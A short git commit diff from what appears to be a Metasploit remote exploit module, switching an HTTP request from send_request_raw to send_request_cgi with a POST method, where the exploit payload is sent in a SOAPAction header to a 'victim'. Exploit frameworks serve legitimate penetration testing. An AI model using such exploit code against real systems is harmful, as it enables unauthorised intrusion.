Changed the send_request_raw into send_request_cgi function.

unstable
Dejan Lukan 2013-06-03 10:06:24 +02:00
parent 675fbb3045
commit 36f275d71a
1 changed files with 2 additions and 2 deletions

View File

@ -107,9 +107,9 @@ class Metasploit3 < Msf::Exploit::Remote
# Build and send the HTTP request
#
print_status("Sending exploit to victim #{target.name} at ...")
send_request_raw({
'uri' => target_uri.path,
send_request_cgi({
'method' => 'POST',
'uri' => target_uri.path,
'headers' => {
'SOAPAction' => sploit,
#'User-Agent' => 'Python-urllib/2.7',